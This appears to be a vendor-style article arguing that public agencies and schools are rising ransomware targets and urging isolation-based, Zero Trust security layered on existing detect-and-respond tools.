State and local agencies, K–12 school districts, and public institutions of higher learning are rapidly becoming enticing targets for today’s enterprising threat actors. The combination of a large user base (citizens, contractors, and students, for example), a treasure trove of personally identifiable information (PII), and relatively small IT budgets provide a favorable cost-benefit analysis for malicious actors that can lead to a large payoff for a relatively small effort.
Just last month, the Indianapolis Housing Authority was hit with a ransomware attack that disrupted payments through the agency’s Housing Choice Voucher Program and exposed landlords’ personal information. In September, two K–12 school districts in Los Angeles and Michigan were victimized by ransomware attacks that closed schools for several days. These are not isolated incidents. According to a report from the K–12 Cybersecurity Resource Center, there were 408 cyberattacks on U.S. school districts in 2020.
As digital transformation, hybrid work, and remote learning change how public institutions operate, security teams for these organizations need to rethink how they protect their users, data, networks, and applications from dangerous, disruptive, and costly cyberattacks.
Threat actors are taking advantage of legacy security tools
The problem is that most public agencies and education organizations have not kept up with the advanced tactics used by modern threat actors. Today’s Highly Evasive Adaptive Threats (HEAT) allow hackers and ransomware gangs to bypass traditional security tools, gain initial access to vulnerable endpoints, spread laterally through the network in search of valuable targets, and when the time is right, deliver the payload that takes down or takes control of critical systems or data.
These HEAT attacks take advantage of vulnerabilities and shortcomings in traditional security tools that utilize a detect-and-respond approach to cybersecurity and are still in use by many organizations. These tools cede the initial access battlefield to threat actors and rely instead on detecting malicious activity already inside the network. However, given that today’s modern attacks operate at the speed of business, by the time a threat is detected it’s likely already too late. Within milliseconds of the initial access, the damage has already been done and your users, data, applications, and systems are compromised.
The acceleration of digital transformation, cloud migration, hybrid work, and remote learning over the past several years has only exacerbated the shortcomings of the detect-and-respond approach. All it takes is a single user to make a single click for the network, and everything that runs on it, to be exposed. This is especially troubling for higher education organizations that pride themselves on giving students the freedom to explore, share, and collaborate across open architectures. Any restrictions through traditional security solutions such as strict firewall rules, URL filtering, and blacklisting are seen as existential attacks on the school’s philosophy.
A complete rethink of cybersecurity is needed
But not all is lost. Organizations can take several steps now to better protect their growing and distributed IT infrastructure from today’s highly sophisticated threats. Here are three strategies that state agencies and education institutions can implement today to minimize their attack surface:
1. Layer preventative security on top of detection
The detect-and-respond approach isn’t an inherently flawed security strategy. It’s just incomplete. Organizations should add proactive, preventative security capabilities — such as web and email isolation — on top of their existing security stack. Isolation assumes that all content — whether it’s good or bad — is malicious. Rather than get free rein to the end device, content is executed in a remote layer in the cloud and only clean, sanitized content is delivered to the endpoint. Preventing this initial access basically renders ransomware and other malware impotent — creating a layered, holistic approach that both prevents attacks and monitors for malicious behavior.
2. Focus on the user
State and local agencies, K–12 school districts, and institutions of higher learning are increasingly going remote. Remote workers who are no longer protected inside the corporate network have become the new front line in the fight against threat actors — and they’re losing the battle. According to the World Economic Forum, 95% of security breaches are the result of human error. Security strategies should take this into account and evolve past the network-centric approach of the past and focus on proactively protecting users wherever they log in. This may require creating a virtual air gap between users and the rest of the Internet — essentially hermetically sealing them off from malicious content without impacting the native user experience. Rather than restrict what users can and cannot do, isolation protects them transparently in the background without changing how they access content on the Internet.
3. Secure private applications
Digital transformation is moving applications out of the data center to the edge of the network to accommodate remote users and to take advantage of the scale and economics of the cloud. Whether the user is a citizen applying for public services, an in-home medical professional uploading patient information to a digital health records system, or a student accessing research data from an off-campus apartment — critical data is increasingly put at risk on public infrastructure. Traditional security tools of the past, such as virtual private networks (VPNs), are ill-suited to handle this increasing level of traffic — sapping bandwidth, creating performance bottlenecks, and providing a vulnerable access point for threat actors. Rather than rip and replace outdated infrastructure, organizations can simply isolate private applications in the cloud to implement Zero Trust policies that limit authorization to trusted entities. Continually establishing trust through isolation ensures that users are who they say they are without putting constraints on users who should have access.
A Zero Trust, preventative approach
State and local agencies, K–12 school districts, and public institutions of higher learning have not kept up with advanced HEAT attacks — making these organizations enticing targets for malicious actors. These organizations need to rethink their security strategy to better address HEAT attacks, but they don’t necessarily have to rip out existing security infrastructure. A Zero Trust, preventative approach focused on the user and private applications can be layered on top of existing detect-and-respond capabilities — giving security teams visibility and control into expanding threat surfaces without impacting the user experience.